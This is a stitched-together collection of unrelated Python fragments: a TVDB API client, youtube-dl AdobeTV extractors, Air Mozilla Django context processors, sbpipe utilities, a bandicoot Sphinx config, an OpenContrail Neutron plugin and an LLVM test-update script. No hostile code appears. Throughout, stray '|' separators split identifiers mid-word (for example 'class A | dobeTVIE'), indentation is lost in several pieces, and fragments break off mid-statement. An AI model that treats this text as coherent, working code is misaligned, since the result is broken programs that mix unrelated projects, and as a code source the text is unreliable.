        from . import KEYS
        if not KEYS.API_TOKEN or forceNew:
            if not KEYS.API_KEY:
                raise APIKeyError
            # Log in with user credentials when available, otherwise with
            # the API key alone.
            if hasattr(self, "USER") and hasattr(self, "USER_KEY"):
                data = {"apikey": KEYS.API_KEY, "username": self.USER, "userkey": self.USER_KEY}
            else:
                data = {"apikey": KEYS.API_KEY}
            response = requests.request(
                'POST', self._get_complete_url('login'),
                data=json.dumps(data),
                headers=self._headers)
            if response.status_code == 200:
                KEYS.API_TOKEN = response.json()['token']
            else:
                error = "Unknown error while authenticating. Check your api key or your user/userkey"
                try:
                    error = response.json()['error']
                except Exception:
                    # Body was not JSON or lacked an 'error' key; keep the
                    # generic message. (Was a bare `except:`, which also
                    # swallowed KeyboardInterrupt/SystemExit.)
                    pass
                raise AuthenticationError(error)
        return KEYS.API_TOKEN
    def _request(self, method, path, params=None, payload=None, forceNewToken=False, cleanJson=True):
        """
        Perform an authenticated request and return the decoded JSON.
        On HTTP 200 returns the response's 'data' member (or the whole
        JSON when `cleanJson` is false). On any other status it retries
        once with a freshly obtained token; if that also fails it returns
        None — errors are deliberately swallowed, preserving the
        original best-effort contract.
        """
        self._set_token_header(forceNewToken)
        url = self._get_complete_url(path)
        response = requests.request(
            method, url, params=params,
            data=json.dumps(payload) if payload else payload,
            headers=self._headers)
        if response.status_code == 200:
            response.encoding = 'utf-8'
            jsn = response.json()
            # Strip the {'data': ...} envelope when asked to.
            if cleanJson and 'data' in jsn:
                return jsn['data']
            return jsn
        elif not forceNewToken:
            # The token may have expired: retry once with a new login.
            return self._request(method=method, path=path, params=params, payload=payload, forceNewToken=True)
        # BUG FIX: the original raised Exception(response.json()['error'])
        # inside its own try/bare-except/pass, so the raise was always
        # swallowed and None returned regardless; make that explicit.
        return None
    def _GET(self, path, params=None, cleanJson=True):
        """Issue a GET request; see _request for the return contract."""
        return self._request('GET', path, params=params, cleanJson=cleanJson)
    def _POST(self, path, params=None, payload=None, cleanJson=True):
        """Issue a POST request; see _request for the return contract."""
        return self._request('POST', path, params=params, payload=payload, cleanJson=cleanJson)
    def _DELETE(self, path, params=None, payload=None, cleanJson=True):
        """Issue a DELETE request; see _request for the return contract."""
        return self._request('DELETE', path, params=params, payload=payload, cleanJson=cleanJson)
    def _PUT(self, path, params=None, payload=None, cleanJson=True):
        """Issue a PUT request; see _request for the return contract."""
        return self._request('PUT', path, params=params, payload=payload, cleanJson=cleanJson)
    def _set_attrs_to_values(self, response=None):
        """
        Set attributes to dictionary values.
        - e.g.
        >>> import tvdbsimple as tvdb
        >>> show = tvdb.Tv(10332)
        >>> response = show.info()
        >>> show.title # instead of response['title']
        `response` defaults to an empty dict; the mutable default
        argument `response={}` was replaced to avoid cross-call sharing.
        """
        if response is None:
            response = {}
        if isinstance(response, dict):
            for key in response:
                setattr(self, key, response[key])
# The audio card number to be used; use "aplay -l" output to determine
# the card number.
AUDIO_CARD_NUMBER = 1
# The IR/button input pin number.
INP_PIN = 2
# Speed with which the converted text is to be spoken.
TTS_SPEED = 70
# Whether the config server should be spawned; set to False if you do
# not want the config server.
CONFIG_SERVER_SPAWN = True
# Name of the file where the RSS links will be stored.
RSS_LINKS_FILE = "links.txt"
# A temp file used to signal that the RSS list has been updated.
NEW_LIST_FILE = ".changed.tmp"
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
parse_duration,
unified_strdate,
str_to_int,
float_or_none,
ISO639Utils,
)
class A | dobeTVIE(InfoExtractor):
_VALID_URL = r'https?://tv\.adobe\.com/watch/[^/]+/(?P<id>[^/]+)'
_TEST = {
'url': 'http://tv.adobe.com/watch/the-complete-picture-with-julieanne-kost/quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop/',
'md5': '9bc5727bcdd55251f35ad311ca74fa1e',
'info_dict': | {
'id': 'quick-tip-how-to-draw-a-circle-around-an-object-in-photoshop',
'ext': 'mp4',
'title': 'Quick Tip - How to Draw a Circle Around an Object in Photoshop',
'description': 'md5:99ec318dc909d7ba2a1f2b038f7d2311',
'thumbnail': 're:https?://.*\.jpg$',
'upload_date': '20110914',
'duration': 60,
'view_count': int,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
player = self._parse_json(
self._search_regex(r'html5player:\s*({.+?})\s*\n', webpage, 'player'),
video_id)
title = player.get('title') or self._search_regex(
r'data-title="([^"]+)"', webpage, 'title')
description = self._og_search_description(webpage)
thumbnail = self._og_search_thumbnail(webpage)
upload_date = unified_strdate(
self._html_search_meta('datepublished', webpage, 'upload date'))
duration = parse_duration(
self._html_search_meta('duration', webpage, 'duration') or
self._search_regex(
r'Runtime:\s*(\d{2}:\d{2}:\d{2})',
webpage, 'duration', fatal=False))
view_count = str_to_int(self._search_regex(
r'<div class="views">\s*Views?:\s*([\d,.]+)\s*</div>',
webpage, 'view count'))
formats = [{
'url': source['src'],
'format_id': source.get('quality') or source['src'].split('-')[-1].split('.')[0] or None,
'tbr': source.get('bitrate'),
} for source in player['sources']]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'duration': duration,
'view_count': view_count,
'formats': formats,
}
class AdobeTVVideoIE(InfoExtractor):
    """Extractor for embedded video.tv.adobe.com player pages."""
    _VALID_URL = r'https?://video\.tv\.adobe\.com/v/(?P<id>\d+)'
    _TEST = {
        # From https://helpx.adobe.com/acrobat/how-to/new-experience-acrobat-dc.html?set=acrobat--get-started--essential-beginners
        'url': 'https://video.tv.adobe.com/v/2456/',
        'md5': '43662b577c018ad707a63766462b1e87',
        'info_dict': {
            'id': '2456',
            'ext': 'mp4',
            'title': 'New experience with Acrobat DC',
            'description': 'New experience with Acrobat DC',
            'duration': 248.667,
        },
    }
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)
        # The page defines a `bridge` JS variable holding the player config.
        player_params = self._parse_json(self._search_regex(
            r'var\s+bridge\s*=\s*([^;]+);', webpage, 'player parameters'),
            video_id)
        formats = [{
            'url': source['src'],
            'width': source.get('width'),
            'height': source.get('height'),
            'tbr': source.get('bitrate'),
        } for source in player_params['sources']]
        # For both metadata and downloaded files the duration varies among
        # formats. I just pick the max one
        duration = max(filter(None, [
            float_or_none(source.get('duration'), scale=1000)
            for source in player_params['sources']]))
        # Build vtt subtitle entries grouped by (short) language id.
        subtitles = {}
        for translation in player_params.get('translations', []):
            lang_id = translation.get('language_w3c') or ISO639Utils.long2short(translation['language_medium'])
            if lang_id not in subtitles:
                subtitles[lang_id] = []
            subtitles[lang_id].append({
                'url': translation['vttPath'],
                'ext': 'vtt',
            })
        return {
            'id': video_id,
            'formats': formats,
            'title': player_params['title'],
            'description': self._og_search_description(webpage),
            'duration': duration,
            'subtitles': subtitles,
        }
|
items = [
('Home', reverse('main:home'), 'home', ''),
('About', '/about/', '/about', ''),
('Channels', reverse('main:channels'), 'channels', ''),
('Calendar', reverse('main:calendar'), 'calendar', ''),
]
if not request.user.is_staff:
items.append(
('Tag Cloud', reverse('main:tag_cloud'), 'tag_cloud', '')
)
items.append(
('Starred', reverse('starred:home'), 'starred', '')
)
unfinished_events = 0
if request.user.is_active:
unfinished_events = Event.objects.filter(
creator=request.user,
status=Event.STATUS_INITIATED,
upload__isnull=False,
).count()
if settings.USE_NEW_UPLOADER:
items.append(
('New/Upload', reverse('new:home'), 'new', ''),
)
else:
items.append(
('Requests', reverse('suggest:start'), 'suggest', ''),
)
if request.user.is_staff:
items.append(
('Management', reverse('manage:events'), '', ''),
)
if not settings.BROWSERID_DISABLED:
items.append(
('Sign out', '/browserid/logout/', '', 'browserid-logout'),
)
return {'items': items, 'unfinished_events': unfinished_events}
# The reason for making this a closure is because this stuff is not
# needed on every single template render. Only the main pages where
# there is a nav bar at all.
return {'nav_bar': get_nav_bar}
def dev(request):
    """Expose deployment/debug flags from settings to the template context."""
    flags = ('DEV', 'DEBUG', 'BROWSERID_DISABLED')
    return {name: getattr(settings, name) for name in flags}
def search_form(request):
    """Expose a SearchForm bound to the current query string."""
    form = SearchForm(request.GET)
    return {'search_form': form}
def base(request):
    """Context processor exposing the Event model and lazy feed metadata."""
    def get_feed_data():
        # Feed privacy depends on who is looking.
        feed_privacy = _get_feed_privacy(request.user)
        channels = getattr(request, 'channels', None)
        if not channels:
            channels = Channel.objects.filter(
                slug=settings.DEFAULT_CHANNEL_SLUG
            )
        slugs = [channel.slug for channel in channels]
        if settings.DEFAULT_CHANNEL_SLUG in slugs:
            # Main feed.
            return {
                'title': 'Air Mozilla RSS',
                'url': reverse('main:feed', args=(feed_privacy,)),
            }
        # Channel-specific feed, named after the first channel.
        first = channels[0]
        return {
            'title': 'Air Mozilla - %s - RSS' % first.name,
            'url': reverse(
                'main:channel_feed',
                args=(first.slug, feed_privacy)
            ),
        }
    return {
        # used for things like {% if event.attr == Event.ATTR1 %}
        'Event': Event,
        'get_feed_data': get_feed_data,
    }
def sidebar(request):
    """Context processor providing sidebar data (upcoming/featured events
    and static side-pages) as a lazily-evaluated closure."""
    # none of this is relevant if you're in certain URLs
    def get_sidebar():
        data = {}
        if not getattr(request, 'show_sidebar', True):
            return data
        # if viewing a specific page is limited by channel, apply that
        # filtering here too
        if getattr(request, 'channels', None):
            channels = request.channels
        else:
            channels = Channel.objects.filter(
                slug=settings.DEFAULT_CHANNEL_SLUG
            )
        if settings.DEFAULT_CHANNEL_SLUG in [x.slug for x in channels]:
            sidebar_channel = settings.DEFAULT_CHANNEL_SLUG
        else:
            _channel = channels[0]
            sidebar_channel = _channel.slug
        data['upcoming'] = get_upcoming_events(channels, request.user)
        data['featured'] = get_featured_events(channels, request.user)
        # Static pages whose url matches the channel (or the '*' wildcard)
        # fill the top/bottom sidebar slots.
        data['sidebar_top'] = None
        data['sidebar_bottom'] = None
        sidebar_urls_q = (
            Q(url='sidebar_top_%s' % sidebar_channel) |
            Q(url='sidebar_bottom_%s' % sidebar_channel) |
            Q(url='sidebar_top_*') |
            Q(url='sidebar_bottom_*')
        )
        # to avoid having to do 2 queries, make a combined one
        # set it up with an iterator
        for page in StaticPage.objects.filter(sidebar_urls_q):
            if page.url.startswith('sidebar_top_'):
                data['sidebar_top'] = page
            elif page.url.startswith('sidebar_bottom_'):
                data['sidebar_bottom'] = page
        return data
    # Make this context processor return a closure so it's explicit
    # from the template if you need its data.
    return {'get_sidebar': get_sidebar}
def get_upcoming_events(channels, user,
                        length=settings.UPCOMING_SIDEBAR_COUNT):
    """Return a (cached) queryset of upcoming events for *channels*,
    visibility-filtered for *user* and truncated to *length*."""
    anonymous = not user.is_active
    # is_contributor is only consulted for active users.
    contributor = user.is_active and is_contributor(user)
    cache_key = 'upcoming_events_%s_%s' % (int(anonymous), int(contributor))
    cache_key += ','.join(str(channel.id) for channel in channels)
    recent = most_recent_event()
    if recent:
        # Bust the cache whenever the most recent event changes.
        cache_key += str(recent.modified.microsecond)
    upcoming = cache.get(cache_key)
    if upcoming is None:
        upcoming = _get_upcoming_events(channels, anonymous, contributor)[:length]
        cache.set(cache_key, upcoming, 60 * 60)
    return upcoming
def _get_upcoming_events(channels, anonymous, contributor):
    """Do the heavy lifting of building the upcoming-events queryset."""
    qs = (
        Event.objects.upcoming()
        .order_by('start_time')
        .filter(channels__in=channels)
        .distinct()
        .select_related('picture')
    )
    # Anonymous visitors never see company-private events; contributors
    # are restricted to fully public ones.
    if anonymous:
        qs = qs.exclude(privacy=Event.PRIVACY_COMPANY)
    elif contributor:
        qs = qs.filter(privacy=Event.PRIVACY_PUBLIC)
    return qs
def get_featured_events(
    channels,
    user,
    length=settings.FEATURED_SIDEBAR_COUNT
):
    """Return a list of events ordered by their hit-stats score,
    visibility-filtered for *user* and truncated to *length*."""
    anonymous = not user.is_active
    # is_contributor is only consulted for active users.
    contributor = user.is_active and is_contributor(user)
    cache_key = 'featured_events_%s_%s' % (int(anonymous), int(contributor))
    if channels:
        cache_key += ','.join(str(channel.id) for channel in channels)
    recent = most_recent_event()
    if recent:
        # Bust the cache whenever the most recent event changes.
        cache_key += str(recent.modified.microsecond)
    featured = cache.get(cache_key)
    if featured is None:
        featured = _get_featured_events(channels, anonymous, contributor)[:length]
        cache.set(cache_key, featured, 60 * 60)
    # The left outer join over the many-to-many table can yield the same
    # event through several EventHitStats rows, and Django can't de-dupe
    # that with a simple .distinct('id') (Postgres requires the DISTINCT
    # column to appear in the ordering, which would break the score
    # ordering). So de-duplicate manually while preserving order.
    events = []
    for stat in featured:
        if stat.event not in events:
            events.append(stat.event)
    return events
def _get_featured_events(channels, anonymous, contributor):
"""do the heavy lifting of getting the featured events"""
now = timezone.now()
yesterday = now - datetime.timedelta(days=1)
# subtract one second to not accidentally tip it
yesterday -= datetime.timedelta(seconds=1)
featured = (
EventHitStats.objects
.filter(
Q(event__status=Event.STATUS_SCHEDULED) |
Q(event__status=Event.STATUS_PROCESSING)
)
. |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Piero Dalle Pezze
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distri | bute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT | WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import subprocess
import logging
logger = logging.getLogger('sbpipe')
def which(cmd_name):
    """
    Utility equivalent to `which` in GNU/Linux OS.
    :param cmd_name: a command name
    :return: the command name with absolute path if it exists on PATH
             (checking both `cmd_name` and `cmd_name`.exe per directory),
             or None
    """
    for directory in os.environ["PATH"].split(os.pathsep):
        for candidate in (cmd_name, cmd_name + '.exe'):
            full_path = os.path.join(directory, candidate)
            if os.path.exists(full_path):
                return full_path
    return None
def is_py_package_installed(package):
    """
    Utility checking whether a Python package is installed.
    :param package: a Python package name
    :return: True if it is installed, false otherwise.
    """
    try:
        proc = subprocess.Popen(['pip', 'list'],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        installed_packages = proc.communicate()[0]
    except OSError:
        logger.warning("pip is not installed")
        return False
    # NOTE: substring match, as in the original implementation.
    return package in str(installed_packages)
def is_r_package_installed(package):
    """
    Utility checking whether a R package is installed.
    :param package: an R package name
    :return: True if it is installed, false otherwise.
    """
    script = os.path.join(os.path.dirname(__file__), os.pardir,
                          "is_package_installed.r")
    try:
        proc = subprocess.Popen(['Rscript', script, package],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        output = proc.communicate()[0]
        logger.debug("is sbpiper installed? " + str(output))
        # The helper script prints TRUE/FALSE.
        return "TRUE" in str(output)
    except OSError:
        logger.error("R is not installed")
        return False
|
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# Sphinx configuration for the bandicoot documentation build.
# (Options left commented out document the Sphinx defaults.)
import sys
import mozilla_sphinx_theme
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, '..')
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.mathjax',
    'sphinx.ext.autosummary',
    'sphinx.ext.napoleon'
]
# Docstrings follow the NumPy convention; napoleon converts them for autodoc.
napoleon_google_docstring = False
napoleon_numpy_docstring = True
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bandicoot'
copyright = u'2014-2015, Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "mozilla"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# The theme is resolved from the installed mozilla_sphinx_theme package.
html_theme_path = [os.path.dirname(mozilla_sphinx_theme.__file__)]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bandicootdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
  ('index', 'bandicoot.tex', u'bandicoot Documentation',
   u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'bandicoot', u'bandicoot Documentation',
     [u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'bandicoot', u'bandicoot Documentation',
   u'Yves-Alexandre de Montjoye, Luc Rocher, Alex Pentland', 'bandicoot', 'A python toolbox for mobile phone metadata',
   'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = T |
t['id'] = resource_id
if resource:
resource_dict['resource'] = resource
resource_dict['filters'] = filters
resource_dict['fields'] = fields
return resource_dict
def _prune(self, resource_dict, fields):
if fields:
return dict(((key, item) for key, item in resource_dict.items()
if key in fields))
return resource_dict
def _transform_response(self, status_code, info=None, obj_name=None,
fields=None):
if status_code == requests.codes.ok:
if not isinstance(info, list):
return self._prune(info, fields)
else:
return [self._prune(items, fields) for items in info]
self._raise_contrail_error(status_code, info, obj_name)
def _raise_contrail_error(self, status_code, info, obj_name):
if status_code == requests.codes.bad_request:
raise ContrailBadRequestError(
msg=info['message'], resource=obj_name)
error_class = CONTRAIL_EXCEPTION_MAP[status_code]
raise error_class(msg=info['message'])
def _create_resource(self, res_type, context, res_data):
"""Create a resource in API server.
This method encodes neutron model, and sends it to the
contrail api server.
"""
for key, value in res_data[res_type].items():
if value == attr.ATTR_NOT_SPECIFIED:
del res_data[res_type][key]
res_dict = self._encode_resource(resource=res_data[res_type])
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'CREATE')
res_dicts = self._transform_response(status_code, info=res_info,
obj_name=res_type)
LOG.debug("create_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _get_resource(self, res_type, context, id, fields):
"""Get a resource from API server.
This method gets a resource from the contrail api server
"""
res_dict = self._encode_resource(resource_id=id, fields=fields)
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'READ')
res_dicts = self._transform_response(status_code, info=res_info,
fields=fields, obj_name=res_type)
LOG.debug("get_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _update_resource(self, res_type, context, id, res_data):
"""Update a resource in API server.
This method updates a resource in the contrail api server
"""
res_dict = self._encode_resource(resource_id=id,
resource=res_data[res_type])
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'UPDATE')
res_dicts = self._transform_response(status_code, info=res_info,
obj_name=res_type) |
LOG.debug("update_%(res_type)s(): %(res_dicts)s",
{'res_type': res_type, 'res_dicts': res_dicts})
return res_dicts
def _delete_resource(self, res_type, context, id):
"""Delete a resource in API server
This method deletes a resource in the contrail api server
| """
res_dict = self._encode_resource(resource_id=id)
LOG.debug("delete_%(res_type)s(): %(id)s",
{'res_type': res_type, 'id': id})
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'DELETE')
if status_code != requests.codes.ok:
self._raise_contrail_error(status_code, info=res_info,
obj_name=res_type)
def _list_resource(self, res_type, context, filters, fields):
res_dict = self._encode_resource(filters=filters, fields=fields)
status_code, res_info = self._request_backend(context, res_dict,
res_type, 'READALL')
res_dicts = self._transform_response(status_code, info=res_info,
fields=fields, obj_name=res_type)
LOG.debug(
"get_%(res_type)s(): filters: %(filters)r data: %(res_dicts)r",
{'res_type': res_type, 'filters': filters,
'res_dicts': res_dicts})
return res_dicts
def _count_resource(self, res_type, context, filters):
res_dict = self._encode_resource(filters=filters)
status_code, res_count = self._request_backend(context, res_dict,
res_type, 'READCOUNT')
LOG.debug("get_%(res_type)s_count(): %(res_count)r",
{'res_type': res_type, 'res_count': res_count})
return res_count
def _get_network(self, context, id, fields=None):
return self._get_resource('network', context, id, fields)
def create_network(self, context, network):
"""Creates a new Virtual Network."""
return self._create_resource('network', context, network)
def get_network(self, context, network_id, fields=None):
"""Get the attributes of a particular Virtual Network."""
return self._get_network(context, network_id, fields)
def update_network(self, context, network_id, network):
"""Updates the attributes of a particular Virtual Network."""
return self._update_resource('network', context, network_id,
network)
    def delete_network(self, context, network_id):
        """Deletes a Virtual Network.

        Deletes the network with the specified network identifier
        belonging to the specified tenant.
        """
        self._delete_resource('network', context, network_id)
def get_networks(self, context, filters=None, fields=None):
"""Get the list of Virtual Networks."""
return self._list_resource('network', context, filters,
fields)
def get_networks_count(self, context, filters=None):
"""Get the count of Virtual Network."""
networks_count = self._count_resource('network', context, filters)
return networks_count['count']
def create_subnet(self, context, subnet):
"""Creates a new subnet, and assigns it a symbolic name."""
if subnet['subnet']['gateway_ip'] is None:
subnet['subnet']['gateway_ip'] = '0.0.0.0'
if subnet['subnet']['host_routes'] != attr.ATTR_NOT_SPECIFIED:
if (len(subnet['subnet']['host_routes']) >
cfg.CONF.max_subnet_host_routes):
raise exc.HostRoutesExhausted(subnet_id=subnet[
'subnet'].get('id', _('new subnet')),
quota=cfg.CONF.max_subnet_host_routes)
subnet_created = self._create_resource('subnet', context, subnet)
return self._make_subnet_dict(subnet_created)
def _make_subnet_dict(self, subnet):
if 'gateway_ip' in subnet and subnet['gateway_ip'] == '0.0.0.0':
subnet['gateway_ip'] = None
return subnet
def _get_subnet(self, context, subnet_id, fields=None):
subnet = self._get_resource('subnet', context, subnet_id, fields)
return self._make_subnet_dict(subnet)
def get_subnet(self, context, subnet_id, fields=None):
"""Get the attributes of a particular subnet."""
return self._get_subnet(context, subnet_id, fields)
def update_subnet(self, context, subnet_id, subnet):
"""Updates the attributes of a particular subnet."""
subnet = self._update_resource('subnet', context, subnet_id, subnet)
return self._make_subnet_dict(subnet)
def delete_subnet(self, context, subnet_id):
|
#!/usr/bin/env python3
"""A script to generate FileCheck statements for 'opt' analysis tests.
This script is a utility to update LLVM opt analysis test cases with new
FileCheck patterns. It can either update all of the tests in the file or
a single test function.
Example usage:
$ update_analyze_test_checks.py --opt=../bin/opt test/foo.ll
Workflow:
1. Make a compiler patch that requires updating some number of FileCheck lines
in regression test files.
2. Save the patch and revert it from your local work area.
3. Update the RUN-lines in the affected regression tests to look canonical.
Example: "; RUN: opt < %s -analyze -cost-model -S | FileCheck %s"
4. Refresh the FileCheck lines for either the entire file or select functions by
running this script.
5. Commit the fresh baseline of checks.
6. Apply your patch from step 1 and rebuild your local binaries.
7. Re-run this script on affected regression tests.
8. Check the diffs to ensure the script has done something reasonable.
9. Submit a patch including the regression test diffs for review.
A common pattern is to have the script insert complete checking of every
instruction. Then, edit it down to only check the relevant instructions.
The script is designed to make adding checks to a test case fast, it is *not*
designed to be authoratitive about what constitutes a good test!
"""
from __future__ import print_function
import argparse
import glob
import itertools
import os # Used to advertise this file's name ("autogenerated_note").
import string
import subprocess
import sys
import tempfile
import re
from UpdateTestChecks import common
ADVERT = '; NOTE: Assertions have been autogenerated by '
def main():
  """Regenerate FileCheck assertions for 'opt' analysis tests.

  For each test file given on the command line, re-runs the opt command(s)
  from its RUN lines and splices freshly generated CHECK lines back into
  the file in place.
  """
  from argparse import RawTextHelpFormatter
  parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
  parser.add_argument('--opt-binary', default='opt',
                      help='The opt binary used to generate the test case')
  parser.add_argument(
      '--function', help='The function in the test file to update')
  parser.add_argument('tests', nargs='+')
  args = common.parse_commandline_args(parser)
  script_name = os.path.basename(__file__)
  autogenerated_note = (ADVERT + 'utils/' + script_name)
  opt_basename = os.path.basename(args.opt_binary)
  if (opt_basename != "opt"):
    common.error('Unexpected opt name: ' + opt_basename)
    sys.exit(1)
  test_paths = [test for pattern in args.tests for test in glob.glob(pattern)]
  for test in test_paths:
    with open(test) as f:
      input_lines = [l.rstrip() for l in f]
    first_line = input_lines[0] if input_lines else ""
    if 'autogenerated' in first_line and script_name not in first_line:
      common.warn("Skipping test which wasn't autogenerated by " + script_name + ": " + test)
      continue
    if args.update_only:
      if not first_line or 'autogenerated' not in first_line:
        common.warn("Skipping test which isn't autogenerated: " + test)
        continue
    run_lines = common.find_run_lines(test, input_lines)
    prefix_list = []
    for l in run_lines:
      if '|' not in l:
        common.warn('Skipping unparseable RUN line: ' + l)
        continue
      (tool_cmd, filecheck_cmd) = tuple([cmd.strip() for cmd in l.split('|', 1)])
      common.verify_filecheck_prefixes(filecheck_cmd)
      # Fixed message typo: was 'WSkipping non-%s RUN line'.
      if not tool_cmd.startswith(opt_basename + ' '):
        common.warn('Skipping non-%s RUN line: %s' % (opt_basename, l))
        continue
      if not filecheck_cmd.startswith('FileCheck '):
        common.warn('Skipping non-FileChecked RUN line: ' + l)
        continue
      tool_cmd_args = tool_cmd[len(opt_basename):].strip()
      tool_cmd_args = tool_cmd_args.replace('< %s', '').replace('%s', '').strip()
